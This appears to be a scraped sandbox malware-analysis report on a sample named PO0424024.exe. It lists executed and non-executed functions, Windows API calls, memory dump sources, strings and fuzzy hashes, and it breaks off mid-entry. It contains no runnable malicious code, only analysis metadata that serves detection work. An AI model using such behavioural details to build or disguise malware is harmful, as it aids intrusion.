Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: 83edf8c2551ac690b97935ecb52eace3758e8441b17f2251f03973b2c2033870
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: 44F03FB5D052089B8F04DFA9D5418EEFBF2BB5A310F10A16AE814B3314E73599518FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0710F128 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266e669ad6b4ba755412a45154e1c36e7f1ec286d1a87e0e93dafab3b9551d32
Instruction ID: 2e1fa6294507c1631dba9eff3256380d551ea4fa55c722297951d289460e064d
Opcode Fuzzy Hash: 266e669ad6b4ba755412a45154e1c36e7f1ec286d1a87e0e93dafab3b9551d32
Instruction Fuzzy Hash: 55C04C75A6D218D789241D95B4060F8F73CE28F926F023151961FA20C15791567745C5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO0424024.exePID: 6776, Parent PID: 7072COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	8.1%
Total number of Nodes:	135
Total number of Limit Nodes:	10

Executed Functions

Function 004176B3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction ID: 2a91265cd94f82b8a90b0ac5589af7a88cb6d660ce350640a86b0babf6f55db1
Opcode Fuzzy Hash: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction Fuzzy Hash: 72011EB5E4020DABDF10DAE5DC42FDEB378AB54308F00419AE91897280FA75EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042B263 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B297

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction ID: ac43d00b017587eaa0f2c99acff632717b88ee847b47d6ef24b20caf8d36fc33
Opcode Fuzzy Hash: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction Fuzzy Hash: 66E04F356402147BC610EA5ADC41F9BB75CDFC5754F004459FA08A7142C6717A118BF8

Uniqueness

Uniqueness Score: -1.00%

Function 00FA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00FA35CA

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
Instruction ID: 68e663891a30bffe9fd1c570e1488b62b4574376199ce01a593b97010f99aa48
Opcode Fuzzy Hash: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
Instruction Fuzzy Hash: FF90023160550412D20071598914746100D87D0341F65C422A04255A8E8B998A52BDA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00FA2B6A

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
Instruction ID: 778b7ceb9fd645a1aa591e683abfe89eff6a0bbfc408362a0183e6bc92bd035e
Opcode Fuzzy Hash: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
Instruction Fuzzy Hash: C590026120240013420571598814656400E87E0341B55C032E10155D0EC9298992B925

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00FA2C7A

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
Instruction ID: 8af42a157bced598b53946c69341dcbfe877e9aaa065210cc6926d1ba234737a
Opcode Fuzzy Hash: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
Instruction Fuzzy Hash: 1A90023120148812D2107159C80478A000D87D0341F59C422A4425698E8A998992B921

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00FA2DFA

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
Instruction ID: 9517d00eab424d98d8442838862014c51fc2a734ac2b24bdb3d10d9f15128336
Opcode Fuzzy Hash: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
Instruction Fuzzy Hash: 7290023120140423D21171598904747000D87D0381F95C423A0425598E9A5A8A53F921

Uniqueness

Uniqueness Score: -1.00%

Function 00413C5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D61, 00413D64
43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: a15a9778a0e6aa8d02f37c7fa83aedcf4428c8cceebbe7c11e988b169a2e659c
Instruction ID: bcfe7294399c8e5330b980c9ccd23c718b2973277ca8e0702e339b43b5528ea5
Opcode Fuzzy Hash: a15a9778a0e6aa8d02f37c7fa83aedcf4428c8cceebbe7c11e988b169a2e659c
Instruction Fuzzy Hash: AA2149B1E0024CBADB209BF59C42DDF7F7CDF41268F44415AFA50AB241D6684E0A87A5

Uniqueness

Uniqueness Score: -1.00%

Function 00413CE1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D61, 00413D64
43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: fbfffa7d31d38b797df6e5e1c6aad4c013dc1041716bfeaec18e3793ff31599c
Instruction ID: c2aa92412ef98179fb8ebff923fd0c8e55063f930a6349ae58d638fccc42bbfa
Opcode Fuzzy Hash: fbfffa7d31d38b797df6e5e1c6aad4c013dc1041716bfeaec18e3793ff31599c
Instruction Fuzzy Hash: 8001C8B2E4011C7EDB10AAE5AC82DEF7B7CDF41754F40806AFA14B7141D5785F068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413CE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D61, 00413D64
43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: fffb23aa9ddeec823dd08e1460c8f20b97aa54604dcf6e9f19ad6e241deb67da
Instruction ID: 0d4bbac67b8e8c6ad1a3cb857ff09ffba9d902fb1b1648c0fa7842eed38bfedf
Opcode Fuzzy Hash: fffb23aa9ddeec823dd08e1460c8f20b97aa54604dcf6e9f19ad6e241deb67da
Instruction Fuzzy Hash: 1D01C8B2E4011C7ADB10AAE5AC81DEF7B7CDF41654F40806AFA1477141D5785F068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042B5C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B602

Strings

^dA, xrefs: 0042B5C6

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: ^dA
API String ID: 3298025750-2569602317
Opcode ID: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction ID: cc69992b692840691eaf312d0b561dcd8a78b1c9b6df208bb0cec81a566c1689
Opcode Fuzzy Hash: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction Fuzzy Hash: 1CE06D72604204BBDA10EE99DC41F9B73ACEFC8710F004419FA18A7241C670B9118BB8

Uniqueness

Uniqueness Score: -1.00%

Function 004176A6 Relevance: 1.6, APIs: 1, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction ID: 7dd7ab4ae67f949c9cfc49ab85b4ba0194ea636ff2e7520346db56672388e54d
Opcode Fuzzy Hash: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction Fuzzy Hash: 7601D6B5E0420AAFDB00CBA0DC42FDEBB74AF10318F00419AED0896281F675EB55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042B573 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DEEB,?,?,00000000,?,0041DEEB,?,?,?), ref: 0042B5AF

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction ID: 8d392c0aacc9dab507deb327bea9887e63f69da25420374837b9a169aefa09fb
Opcode Fuzzy Hash: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction Fuzzy Hash: A5E06DB1600204BBC610EE99DC45FAB77ACEFC4710F000019FA18A7282D6B4B910CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B613 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,39F972C8,?,?,39F972C8), ref: 0042B647

Memory Dump Source

Source File: 00000002.00000002.2172226006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO0424024.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1b567072b6604096ac706f461aa3c31240a5062b12ed542193b806810540eed6
Instruction ID: 0f89bd69e690552b6dca5b6b651433203c3ac265cde3a2836dffe4fefecae6be
Opcode Fuzzy Hash: 1b567072b6604096ac706f461aa3c31240a5062b12ed542193b806810540eed6
Instruction Fuzzy Hash: 36E08635640214BBD620FA5ADC41F9B775DDFC5714F40441AFB0CA7182C6B579018BF4

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00FA2C24

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
Instruction ID: 90170a90549b85eb1ae09ca98a9ab9a5d2430bd9b7a23c6b82b662d040512e8a
Opcode Fuzzy Hash: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
Instruction Fuzzy Hash: E3B09B71D015C5D5DB51E7644A0871B79046BD1761F15C072D2030681F473CC5D1F575

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FE2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 00FE25A0
ShutdownFlags, xrefs: 00FE24A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 00FE3176
RaiseExceptionOnPossibleDeadlock, xrefs: 00FE2579
DisableHeapLookaside, xrefs: 00FE246D
CFGOptions, xrefs: 00FE2967
MaxLoaderThreads, xrefs: 00FE24EC
@, xrefs: 00FE2B74
GlobalFlag2, xrefs: 00FE2FC0
GlobalFlag, xrefs: 00FE2F3F, 00FE3059
LdrpInitializeExecutionOptions, xrefs: 00FE317D
TracingFlags, xrefs: 00FE2549
MaxDeadActivationContexts, xrefs: 00FE2D82
MinimumStackCommitInBytes, xrefs: 00FE2BB0
UseImpersonatedDeviceMap, xrefs: 00FE251C
minkernel\ntdll\ldrinit.c, xrefs: 00FE3187
UnloadEventTraceDepth, xrefs: 00FE24C0
DisableExceptionChainValidation, xrefs: 00FE275F
FrontEndHeapDebugOptions, xrefs: 00FE2489
@, xrefs: 00FE2942

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
Instruction ID: b95be93d025998fae8c0ad9ecf7cd0cd8fa6ca5dffedfee5c1da7641326353e9
Opcode Fuzzy Hash: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
Instruction Fuzzy Hash: 5292C071A04381AFE760CF25CC85B6BB7E8BB84720F04492DFA94D7291E774E944EB52

Uniqueness

Uniqueness Score: -1.00%

Function 010112ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0101176D
Heap block at %p has incorrect segment offset (%x), xrefs: 0101181A
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 010118F8
HEAP: , xrefs: 01011706, 01011756, 010117A8, 01011809, 0101184D, 01011895, 010118E6
HEAP[%wZ]: , xrefs: 010116CD, 010116F9, 01011749, 0101179B, 010117FC, 01011840, 010118D9
Heap block at %p is not last block in segment (%p), xrefs: 010117B7
Free Heap block %p modified at %p after it was freed, xrefs: 0101171B
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0101186B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 010118A5

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 98e239e7dbef2d94f6eada385a098bfb0ac0744ad2761723ffdfc7eac7208764
Instruction ID: 3d32cd6e429648b2132519a4651523a6fe02f541ec633d1202fda828947f0b73
Opcode Fuzzy Hash: 98e239e7dbef2d94f6eada385a098bfb0ac0744ad2761723ffdfc7eac7208764
Instruction Fuzzy Hash: F512AC30604642DFD7298F38C441BBABBF1FF09714F188499EAC68B686D738E885DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 00F5D3E9
@, xrefs: 00F5D49D
PreferredUILanguages, xrefs: 00F5D4B8, 00F5D4C5
Control Panel\Desktop\MuiCached, xrefs: 00F5D62B
MachinePreferredUILanguages, xrefs: 00F5D685
PreferredUILanguagesPending, xrefs: 00FBA8DE
@, xrefs: 00F5D663
Control Panel\Desktop, xrefs: 00F5D45D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00F5D3B6

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 4f40d585c90e090169bfc8ab62a79822aced35104a1d1f515440b57bcb6b67c8
Instruction ID: 400924cc33e02f5d0144cae6ae8a81708a89de2fa403688c164babdb1c49c753
Opcode Fuzzy Hash: 4f40d585c90e090169bfc8ab62a79822aced35104a1d1f515440b57bcb6b67c8
Instruction Fuzzy Hash: 5CB1CD729093119FC721CF24C840B6BB7E8AF88764F05092EFA88D7240E734DD49EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

BaseNamedObjects, xrefs: 00FF9477, 00FF947C
\Sessions, xrefs: 00FF9488
\AppContainerNamedObjects, xrefs: 00FF94AB, 00FF94B9
%s\%ld\%s, xrefs: 00FF948D
\BaseNamedObjects, xrefs: 00FF949E
%s\%u-%u-%u-%u, xrefs: 00FF9422
Global\Session\%ld%s, xrefs: 00FF94C5
AppContainerNamedObjects, xrefs: 00FF946E, 00FF94D6

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 5e9f11bc76e7caf015d8ea209b5bcc8cec9db119dc543160878e35acbfd1de46
Instruction ID: 1901fbc8370c71c2ee2d12318da738b9b3e8a1854d744765df207910160a6138
Opcode Fuzzy Hash: 5e9f11bc76e7caf015d8ea209b5bcc8cec9db119dc543160878e35acbfd1de46
Instruction Fuzzy Hash: 59D1F4B280C319AFD721DA54C881B7BB7E8AF94724F044A29FB84E7161D7B4DD04A7D2

Uniqueness

Uniqueness Score: -1.00%

Function 01010274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 010103BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 010106EA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 010104D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0101069F
HEAP: , xrefs: 010103A6, 010104B5, 010105DD, 01010682, 010106D9
HEAP[%wZ]: , xrefs: 01010399, 010104A8, 010105D0, 01010675, 010106CC
RtlReAllocateHeap, xrefs: 010102BF, 01010362
Just reallocated block at %p to %Ix bytes, xrefs: 010105F1

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
Instruction ID: 2ed4fd44619a60e12790c0e9143987238edb53be23f0fdd3dcb156dd5bc09dd8
Opcode Fuzzy Hash: b486a415281ca1089b9b270edf9f4c70a8f76e236f29c687390c00a09af44c63
Instruction Fuzzy Hash: E9D1CB31600685DFDB22DF68C841AAEBBF1FF4A710F088099F9C59B65AD739D984DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 00F5D2AF
Control Panel\Desktop\LanguageConfiguration, xrefs: 00F5D196
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 00F5D262
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 00F5D2C3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 00F5D146
@, xrefs: 00F5D313
@, xrefs: 00F5D0FD
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00F5D0CF

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 2ca63acc8e2bdfabad51b4dbc7e6635641b5b7d26364ef075cb4db3dbcc0f002
Instruction ID: 97032191e80d3b5669cdd46150776ba57aad579a56e860f611917c0a0af0d029
Opcode Fuzzy Hash: 2ca63acc8e2bdfabad51b4dbc7e6635641b5b7d26364ef075cb4db3dbcc0f002
Instruction Fuzzy Hash: A9A170B19093459FD721DF25C840B9BB7E8BB84765F10492EFA8896240E778D908EF93

Uniqueness

Uniqueness Score: -1.00%

Function 00F5F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(UCRBlock != NULL), xrefs: 00FBDF6F
(LONG)FreeEntry->Size > 1, xrefs: 00FBE291
HEAP: , xrefs: 00FBDF64, 00FBE0A8, 00FBE286, 00FBE39E
HEAP[%wZ]: , xrefs: 00FBDF57, 00FBE09B, 00FBE279, 00FBE391
(!TrailingUCR), xrefs: 00FBE3A9
((LONG)FreeEntry->Size > 1), xrefs: 00FBE0B3

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: b86f5e5d2841a736db77e806b0f88574853d8e217eb78276b44ef739bb256595
Instruction ID: cb4c00491f2a548c14e931e203deadf9269cd012258e5775a3a7b70861511d55
Opcode Fuzzy Hash: b86f5e5d2841a736db77e806b0f88574853d8e217eb78276b44ef739bb256595
Instruction Fuzzy Hash: 4F42ED716083819FC715DF29C880BAABBE5FF84714F1849ADF9868B242D734D849EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F7B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 00FC840D, 00FC84E1
DLL %wZ was redirected to %wZ by %s, xrefs: 00FC83FC
LdrpPreprocessDllName, xrefs: 00FC8403, 00FC84D7
API set, xrefs: 00FC83F4, 00FC83F9
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 00FC84D0
SxS, xrefs: 00FC83ED

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
